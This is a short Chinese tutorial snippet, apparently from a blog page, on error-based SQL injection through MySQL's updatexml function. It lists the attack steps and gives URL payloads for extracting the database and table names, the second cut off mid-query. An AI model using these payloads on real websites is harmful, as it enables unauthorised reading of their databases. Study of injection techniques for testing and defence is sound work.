基於報錯的注入模式

updatexml函數   基於報錯的注入一般bu'z步驟 1.求閉合字符;2.爆數據庫名;3.爆表名;4.爆列名;5.爆字段名。     求庫名 ?id=1’ and updatexml(1,concat(0x23,database()),1)%23 求表名 ?id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) f
相關文章
相關標籤/搜索